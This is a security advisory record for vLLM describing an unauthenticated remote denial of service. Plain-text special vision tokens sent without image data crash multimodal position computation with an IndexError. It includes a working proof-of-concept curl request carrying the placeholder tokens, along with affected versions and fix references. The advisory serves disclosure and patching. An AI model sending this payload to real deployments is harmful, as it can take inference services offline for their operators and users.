{"uuid":"GSA_kwCzR0hTQS1ocHY4LXgyNzYtbTU5Zs4ABWN_","url":"https://github.com/advisories/GHSA-hpv8-x276-m59f","title":"vLLM Vulnerable to Remote DoS via Special-Token Placeholders","description":"## Summary\nThis report explains a Token Injection vulnerability in vLLM’s multimodal processing. Text-only prompts from unauthenticated users that spell out special tokens in plain text are interpreted as control tokens. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on `image_grid_thw`/`video_grid_thw` are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.\n\n## Details\n- Affected component: multimodal input position computation.\n- File/functions (paths are indicative):\n  - vllm/model_executor/layers/rotary_embedding.py\n    - get_input_positions_tensor(...)\n    - _vl_get_input_positions_tensor(...)\n- Failure mechanism:\n  - The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.\n  - When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.\n\nRepresentative snippet (context):\n```python\n# vllm/model_executor/layers/rotary_embedding.py\n@classmethod\ndef _vl_get_input_positions_tensor(\n    cls,\n    input_tokens,\n    hf_config,\n    image_grid_thw,\n    video_grid_thw,\n    ...,\n):\n    # detect video tokens\n    video_nums = (vision_tokens == video_token_id).sum()\n    # later in processing\n    t, h, w = (\n        video_grid_thw[video_index][0],  # IndexError if no video data\n        video_grid_thw[video_index][1],\n        video_grid_thw[video_index][2],\n    )\n```\n\nAbbreviated call path:\n```\nOpenAI API request\n → vllm.v1.engine.core: step/execute_model\n → vllm.v1.worker.gpu_model_runner: _update_states/execute_model\n → vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor\n → _vl_get_input_positions_tensor\n → IndexError: list index out of range\n```\n\n## PoC\n### Environment\n- vLLM: 0.10.0\n- Model: Qwen/Qwen2.5-VL-3B-Instruct\n- Launch server:\n```bash\npython -m vllm.entrypoints.openai.api_server \\\n  --model Qwen/Qwen2.5-VL-3B-Instruct \\\n  --port 8000\n```\n\n### Request (text-only, no image/video data)\n```bash\ncat \u003e request.json \u003c\u003c'JSON'\n{\n  \"model\": \"Qwen/Qwen2.5-VL-3B-Instruct\",\n  \"messages\": [\n    {\n      \"role\": \"user\",\n      \"content\": [\n        { \"type\": \"text\",\n          \"text\": \"what's in picture \u003c|vision_start|\u003e\u003c|image_pad|\u003e\u003c|vision_end|\u003e\" }\n      ]\n    }\n  ]\n}\nJSON\n\ncurl -s http://127.0.0.1:8000/v1/chat/completions \\\n  -H 'Content-Type: application/json' \\\n  --data @request.json\n```\n\n### Observed result\n- HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...).\n- In some deployments, the worker exits and capacity remains reduced until manual restart.\n\n## Impact\n- Type: Token Injection leading to Remote Denial of Service (unauthenticated). 
A single request can trigger the fault.\n- Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).\n- Effect: Request → unhandled exception in position computation → worker termination / service unavailability.\n\n## Fixes\n\n* Changes associated with https://github.com/vllm-project/vllm/issues/32656\n\n## Credits\nPengyu Ding (Infra Security, Ant Group)  \nZiteng Xu (Infra Security, Ant Group)","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-05T22:21:41.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f","https://github.com/vllm-project/vllm/issues/32656","https://nvd.nist.gov/vuln/detail/CVE-2026-44222","https://github.com/advisories/GHSA-hpv8-x276-m59f"],"source_kind":"github","identifiers":["GHSA-hpv8-x276-m59f","CVE-2026-44222"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-05T23:00:08.441Z","updated_at":"2026-05-16T01:00:33.946Z","epss_percentage":0.00039,"epss_percentile":0.11742,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ocHY4LXgyNzYtbTU5Zs4ABWN_","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ocHY4LXgyNzYtbTU5Zs4ABWN_","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.20.0","vulnerable_version_range":"\u003e= 0.6.1, \u003c 0.20.0"}],"purl":"pkg:pypi/vllm","statistics":{"dependent_packages_count":46,"dependent_repos_count":5,"downloads":7408760,"downloads_period":"last-month"},"affected_versions":["0.6.1","0.6.2","0.6.3","0.6.3.post1","0.6.4","0.6.4.post1","0.6.5","0.6.6","0.6.6.post1","0.7.0","0.7.1","0.7.2","0.7.3","0.8.0","0.8.1","0.8.2","0.8.3","0.8.4","0.8.5","0.8.5.post1","0.9.0","0.9.0.1","0.9.1","0.9.2","0.10.0","0.10.1","0.10.1.1","0.10.2","0.11.0","0.11.1","0.11.2","0.12.0","0.13.0","0.14.0","0.14.1","0.15.0","0.15.1","0.16.0","0.17.0","0.17.1","0.18.0","0.18.1","0.19.0","0.19.1"],"unaffected_versions":["0.0.1","0.1.0","0.1.1","0.1.2","0.1.3","0.1.4","0.1.5","0.1.6","0.1.7","0.2.0","0.2.1","0.2.1.post1","0.2.2","0.2.3","0.2.4","0.2.5","0.2.6","0.2.7","0.3.0","0.3.1","0.3.2","0.3.3","0.4.0","0.4.0.post1","0.4.1","0.4.2","0.4.3","0.5.0","0.5.0.post1","0.5.1","0.5.2","0.5.3","0.5.3.post1","0.5.4","0.5.5","0.6.0","0.6.1.post1","0.6.1.post2","0.20.0","0.20.1","0.20.2"]}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ocHY4LXgyNzYtbTU5Zs4ABWN_/related_packages","related_advisories":[]}